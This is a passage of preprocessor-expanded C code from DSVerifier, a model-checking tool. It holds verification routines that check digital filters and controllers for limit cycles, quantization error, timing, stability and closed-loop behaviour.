j<0;j++){ arrayLimitCycle[j] = stateMatrix[i][j]; } double_check_persistent_limit_cycle(arrayLimitCycle,0); } for(i=0; i<nOutputs;i++){ for(j=0; j<0;j++){ arrayLimitCycle[j] = outputMatrix[i][j]; } double_check_persistent_limit_cycle(arrayLimitCycle,0); } # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ((void) sizeof (( # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 0 # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 0 # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 ) ; else __assert_fail ( # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" "0" # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 110, __extension__ __PRETTY_FUNCTION__); })) # 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" ; } int verify_limit_cycle(void){ overflow_mode = 3; int i; int Set_xsize_at_least_two_times_Na = 2 * ds.a_size; printf("X_SIZE must be at least 2 * ds.a_size"); __DSVERIFIER_assert(X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na); fxp_t a_fxp[ds.a_size]; fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); # 168 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" fxp_t y[X_SIZE_VALUE]; fxp_t x[X_SIZE_VALUE]; fxp_t min_fxp = fxp_double_to_fxp(impl.min); fxp_t max_fxp = fxp_double_to_fxp(impl.max); fxp_t xaux[ds.b_size]; int nondet_constant_input = nondet_int(); __DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp); for (i = 0; i < X_SIZE_VALUE; ++i) { x[i] = nondet_constant_input; y[i] = 0; } for (i = 0; i < ds.b_size; ++i) { xaux[i] = nondet_constant_input; } int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; fxp_t yaux[ds.a_size]; fxp_t y0[ds.a_size]; fxp_t waux[Nw]; fxp_t w0[Nw]; for (i = 0; i < ds.a_size; ++i) { yaux[i] = nondet_int(); __DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp); y0[i] = yaux[i]; } # 213 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" fxp_t xk, temp; fxp_t *aptr, *bptr, *xptr, *yptr, *wptr; int j; for(i=0; i<X_SIZE_VALUE; ++i){ shiftL(x[i], xaux, ds.b_size); y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size); shiftL(y[i], yaux, ds.a_size); # 278 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" } fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE); return 0; } # 34 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" extern digital_system ds; extern implementation impl; int verify_error(void){ overflow_mode = 2; double a_cascade[100]; int a_cascade_size; double b_cascade[100]; int b_cascade_size; fxp_t a_fxp[ds.a_size]; fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); # 69 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" fxp_t min_fxp = fxp_double_to_fxp(impl.min); fxp_t max_fxp = fxp_double_to_fxp(impl.max); fxp_t y[X_SIZE_VALUE]; fxp_t x[X_SIZE_VALUE]; double yf[X_SIZE_VALUE]; double xf[X_SIZE_VALUE]; int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; fxp_t yaux[ds.a_size]; fxp_t xaux[ds.b_size]; fxp_t waux[Nw]; double yfaux[ds.a_size]; double xfaux[ds.b_size]; double wfaux[Nw]; int i; for (i = 0; i < ds.a_size; ++i) { yaux[i] = 0; yfaux[i] = 0; } for (i = 0; i < ds.b_size; ++i) { xaux[i] = 0; xfaux[i] = 0; } for (i = 0; i < Nw; ++i) { waux[i] = 0; wfaux[i] = 0; } for (i = 0; i < X_SIZE_VALUE; ++i) { y[i] = 0; x[i] = nondet_int(); __DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp); yf[i] = 0.0f; xf[i] = fxp_to_double(x[i]); } for (i = 0; i < X_SIZE_VALUE; ++i) { shiftL(x[i], xaux, ds.b_size); y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size); shiftL(y[i], yaux, ds.a_size); shiftLDouble(xf[i], xfaux, ds.b_size); yf[i] = double_direct_form_1(yfaux, xfaux, ds.a, ds.b, ds.a_size, ds.b_size); shiftLDouble(yf[i], yfaux, ds.a_size); # 169 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h" double absolute_error = yf[i] - fxp_to_double(y[i]); __DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error)); } return 0; } # 35 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 1 # 13 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" extern digital_system ds; extern implementation impl; int verify_zero_input_limit_cycle(void){ overflow_mode = 3; int i,j; int Set_xsize_at_least_two_times_Na = 2 * ds.a_size; printf("X_SIZE must be at least 2 * ds.a_size"); # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4 ((void) sizeof (( # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4 ) ; else __assert_fail ( # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" "X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na" # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h", 23, __extension__ __PRETTY_FUNCTION__); })) # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" ; fxp_t a_fxp[ds.a_size]; fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); # 71 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" fxp_t min_fxp = fxp_double_to_fxp(impl.min); fxp_t max_fxp = fxp_double_to_fxp(impl.max); fxp_t y[X_SIZE_VALUE]; fxp_t x[X_SIZE_VALUE]; for (i = 0; i < X_SIZE_VALUE; ++i) { y[i] = 0; x[i] = 0; } int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; fxp_t yaux[ds.a_size]; fxp_t xaux[ds.b_size]; fxp_t waux[Nw]; fxp_t y0[ds.a_size]; fxp_t w0[Nw]; for (i = 0; i < ds.a_size; ++i) { yaux[i] = nondet_int(); __DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp); y0[i] = yaux[i]; } # 111 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" for (i = 0; i < ds.b_size; ++i) { xaux[i] = 0; } fxp_t xk, temp; fxp_t *aptr, *bptr, *xptr, *yptr, *wptr; for(i=0; i<X_SIZE_VALUE; ++i){ shiftL(x[i], xaux, ds.b_size); y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size); shiftL(y[i], yaux, ds.a_size); # 188 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" } fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE); return 0; } # 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 1 # 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" int nondet_int(); float nondet_float(); extern digital_system ds; extern implementation impl; extern hardware hw; int generic_timer = 0; int verify_generic_timing(void) { double y[X_SIZE_VALUE]; double x[X_SIZE_VALUE]; int i; for (i = 0; i < X_SIZE_VALUE; ++i) { y[i] = 0; x[i] = nondet_float(); __DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max); } int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; double yaux[ds.a_size]; double xaux[ds.b_size]; double waux[Nw]; for (i = 0; i < ds.a_size; ++i) { yaux[i] = 0; } for (i = 0; i < ds.b_size; ++i) { xaux[i] = 0; } for (i = 0; i < Nw; ++i) { waux[i] = 0; } double xk, temp; double *aptr, *bptr, *xptr, *yptr, *wptr; int j; generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp)); double initial_timer = generic_timer; for (i = 0; i < X_SIZE_VALUE; ++i) { generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.adiw) + (2 * hw.assembly.std)); generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.cpi) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt)); generic_timing_shift_l_double(x[i], xaux, ds.b_size); y[i] = generic_timing_double_direct_form_1(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size); generic_timing_shift_l_double(y[i], yaux, ds.a_size); # 88 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" double spent_time = (((double) generic_timer) * hw.cycle); # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4 ((void) sizeof (( # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" spent_time <= ds.sample_time # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" spent_time <= ds.sample_time # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4 ) ; else __assert_fail ( # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" "spent_time <= ds.sample_time" # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h", 89, __extension__ __PRETTY_FUNCTION__); })) # 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" ; generic_timer = initial_timer; } return 0; } # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" 1 # 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" int nondet_int(); float nondet_float(); extern digital_system ds; extern implementation impl; int verify_timing_msp_430(void) { double y[X_SIZE_VALUE]; double x[X_SIZE_VALUE]; int i; for (i = 0; i < X_SIZE_VALUE; ++i) { y[i] = 0; x[i] = nondet_float(); __DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max); } int Nw = 0; Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size; double yaux[ds.a_size]; double xaux[ds.b_size]; double waux[Nw]; for (i = 0; i < ds.a_size; ++i) { yaux[i] = 0; } for (i = 0; i < ds.b_size; ++i) { xaux[i] = 0; } for (i = 0; i < Nw; ++i) { waux[i] = 0; } double xk, temp; double *aptr, *bptr, *xptr, *yptr, *wptr; int j; for (i = 0; i < X_SIZE_VALUE; ++i) { shiftL(x[i], xaux, ds.b_size); y[i] = double_direct_form_1_MSP430(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size); shiftL(y[i], yaux, ds.a_size); # 121 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" } return 0; } # 38 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 1 # 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" extern digital_system ds; extern implementation impl; int verify_stability(void){ overflow_mode = 0; fxp_t a_fxp[ds.a_size]; fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size); double _a[ds.a_size]; fxp_to_double_array(_a, a_fxp, ds.a_size); # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4 ((void) sizeof (( # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" check_stability(_a, ds.a_size) # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" check_stability(_a, ds.a_size) # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4 ) ; else __assert_fail ( # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" "check_stability(_a, ds.a_size)" # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h", 37, __extension__ __PRETTY_FUNCTION__); })) # 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" ; # 83 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" return 0; } # 39 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" 1 # 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" extern digital_system ds; extern implementation impl; int verify_minimum_phase(void){ overflow_mode = 0; fxp_t b_fxp[ds.b_size]; fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size); double _b[ds.b_size]; fxp_to_double_array(_b, b_fxp, ds.b_size); __DSVERIFIER_assert(check_stability(_b, ds.b_size)); # 85 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" return 0; } # 40 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" extern digital_system plant; extern digital_system plant_cbmc; extern digital_system controller; int verify_stability_closedloop_using_dslib(void){ double * c_num = controller.b; int c_num_size = controller.b_size; double * c_den = controller.a; int c_den_size = controller.a_size; fxp_t c_num_fxp[controller.b_size]; fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size); fxp_t c_den_fxp[controller.a_size]; fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size); double c_num_qtz[controller.b_size]; fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size); double c_den_qtz[controller.a_size]; fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size); # 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" double * p_num = plant_cbmc.b; int p_num_size = plant.b_size; double * p_den = plant_cbmc.a; int p_den_size = plant.a_size; double ans_num[100]; int ans_num_size = controller.b_size + plant.b_size - 1; double ans_den[100]; int ans_den_size = controller.a_size + plant.a_size - 1; # 68 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" printf("Verifying stability for closedloop function\n"); __DSVERIFIER_assert(check_stability_closedloop(ans_den, ans_den_size, p_num, p_num_size, p_den, p_den_size)); return 0; } # 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" 1 # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" extern digital_system plant; extern digital_system plant_cbmc; extern digital_system controller; double nondet_double(); int verify_limit_cycle_closed_loop(void){ overflow_mode = 3; double * c_num = controller.b; int c_num_size = controller.b_size; double * c_den = controller.a; int c_den_size = controller.a_size; fxp_t c_num_fxp[controller.b_size]; fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size); fxp_t c_den_fxp[controller.a_size]; fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size); double c_num_qtz[controller.b_size]; fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size); double c_den_qtz[controller.a_size]; fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size); # 58 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" double * p_num = plant_cbmc.b; int p_num_size = plant.b_size; double * p_den = plant_cbmc.a; int p_den_size = plant.a_size; double ans_num[100]; int ans_num_size = controller.b_size + plant.b_size - 1; double ans_den[100]; int ans_den_size = controller.a_size + plant.a_size - 1; int i; double y[X_SIZE_VALUE]; double x[X_SIZE_VALUE]; double xaux[ans_num_size]; double nondet_constant_input = nondet_double(); __DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max); for (i = 0; i < X_SIZE_VALUE; ++i) { x[i] = nondet_constant_input; y[i] = 0; } for (i = 0; i < ans_num_size; ++i) { xaux[i] = nondet_constant_input; } double yaux[ans_den_size]; double y0[ans_den_size]; int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size; double waux[Nw]; double w0[Nw]; for (i = 0; i < ans_den_size; ++i) { yaux[i] = nondet_int(); __DSVERIFIER_assume(yaux[i] >= impl.min && yaux[i] <= impl.max); y0[i] = yaux[i]; } # 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" double xk, temp; double *aptr, *bptr, *xptr, *yptr, *wptr; int j; for(i=0; i<X_SIZE_VALUE; ++i){ shiftLDouble(x[i], xaux, ans_num_size); y[i] = double_direct_form_1(yaux, xaux, ans_den, ans_num, ans_den_size, ans_num_size); shiftLDouble(y[i], yaux, ans_den_size); # 137 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" } double_check_persistent_limit_cycle(y, X_SIZE_VALUE); return 0; } # 42 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" 1 # 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" extern digital_system plant; extern digital_system plant_cbmc; extern digital_system controller; int verify_error_closedloop(void){ overflow_mode = 3; double * c_num = controller.b; int c_num_size = controller.b_size; double * c_den = controller.a; int c_den_size = controller.a_size; fxp_t c_num_fxp[controller.b_size]; fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size); fxp_t c_den_fxp[controller.a_size]; fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size); double c_num_qtz[controller.b_size]; fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size); double c_den_qtz[controller.a_size]; fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size); # 56 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" double * p_num = plant_cbmc.b; int p_num_size = plant.b_size; double * p_den = plant_cbmc.a; int p_den_size = plant.a_size; double ans_num_double[100]; double ans_num_qtz[100]; int ans_num_size = controller.b_size + plant.b_size - 1; double ans_den_qtz[100]; double ans_den_double[100]; int ans_den_size = controller.a_size + plant.a_size - 1; # 77 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" int i; double y_qtz[X_SIZE_VALUE]; double y_double[X_SIZE_VALUE]; double x_qtz[X_SIZE_VALUE]; double x_double[X_SIZE_VALUE]; double xaux_qtz[ans_num_size]; double xaux_double[ans_num_size]; double xaux[ans_num_size]; double nondet_constant_input = nondet_double(); __DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max); for (i = 0; i < X_SIZE_VALUE; ++i) { x_qtz[i] = nondet_constant_input; x_double[i] = nondet_constant_input; y_qtz[i] = 0; y_double[i] = 0; } for (i = 0; i < ans_num_size; ++i) { xaux_qtz[i] = nondet_constant_input; xaux_double[i] = nondet_constant_input; } double yaux_qtz[ans_den_size]; double yaux_double[ans_den_size]; double y0_qtz[ans_den_size]; double y0_double[ans_den_size]; int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size; double waux_qtz[Nw]; double waux_double[Nw]; double w0_qtz[Nw]; double w0_double[Nw]; for (i = 0; i < ans_den_size; ++i) { yaux_qtz[i] = 0; yaux_double[i] = 0; } for(i=0; i<X_SIZE_VALUE; ++i){ shiftLDouble(x_qtz[i], xaux_qtz, ans_num_size); y_qtz[i] = double_direct_form_1(yaux_qtz, xaux_qtz, ans_den_qtz, ans_num_qtz, ans_den_size, ans_num_size); shiftLDouble(y_qtz[i], yaux_qtz, ans_den_size); shiftLDouble(x_double[i], xaux_double, ans_num_size); y_double[i] = double_direct_form_1(yaux_double, xaux_double, ans_den_double, ans_num_double, ans_den_size, ans_num_size); shiftLDouble(y_double[i], yaux_double, ans_den_size); # 156 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" double absolute_error = y_double[i] - fxp_to_double(y_qtz[i]); __DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error)); } return 0; } # 43 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 1 # 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" extern digital_system_state_space _controller; extern double error_limit; extern int closed_loop; double new_state[4][4]; double new_stateFWL[4][4]; digital_system_state_space _controller_fxp; digital_system_state_space _controller_double; double ss_system_quantization_error(fxp_t inputs){ digital_system_state_space __backupController; int i; int j; _controller.inputs[0][0] = inputs; for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ __backupController.A[i][j]= (_controller.A[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<nInputs;j++){ __backupController.B[i][j]= (_controller.B[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<nStates;j++){ __backupController.C[i][j]= (_controller.C[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ __backupController.D[i][j]= (_controller.D[i][j]); } } for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ __backupController.states[i][j]= (_controller.states[i][j]); } } for(i=0; i<nInputs;i++){ for(j=0; j<1;j++){ __backupController.inputs[i][j]= (_controller.inputs[i][j]); } } for(i=0; i<nOutputs;i++){ for(j=0; j<1;j++){ __backupController.outputs[i][j]= (_controller.outputs[i][j]); } } double __quant_error = 0.0; for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ _controller.states[i][j]= (new_state[i][j]); } } double output_double = double_state_space_representation(); for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ new_state[i][j]= (_controller.states[i][j]); } } __backupController.inputs[0][0] = inputs; for(i=0; i<nStates;i++){ for(j=0; j<nStates;j++){ _controller.A[i][j] = __backupController.A[i][j]; } } for(i=0; i<nStates;i++){ for(j=0; j<nInputs;j++){ _controller.B[i][j] = __backupController.B[i][j]; } } for(i=0; i<nOutputs;i++){ for(j=0; j<nStates;j++){ _controller.C[i][j] = __backupController.C[i][j]; } } for(i=0; i<nOutputs;i++){ for(j=0; j<nInputs;j++){ _controller.D[i][j] = __backupController.D[i][j]; } } for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ _controller.states[i][j] = __backupController.states[i][j]; } } for(i=0; i<nInputs;i++){ for(j=0; j<1;j++){ _controller.inputs[i][j] = __backupController.inputs[i][j]; } } for(i=0; i<nOutputs;i++){ for(j=0; j<1;j++){ _controller.outputs[i][j] = __backupController.outputs[i][j]; } } for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ _controller.states[i][j]= (new_stateFWL[i][j]); } } double output_fxp = fxp_state_space_representation(); for(i=0; i<nStates;i++){ for(j=0; j<1;j++){ new_stateFWL[i][j]= (_controller.states[i][j]); } } __quant_error = output_double - output_fxp; return 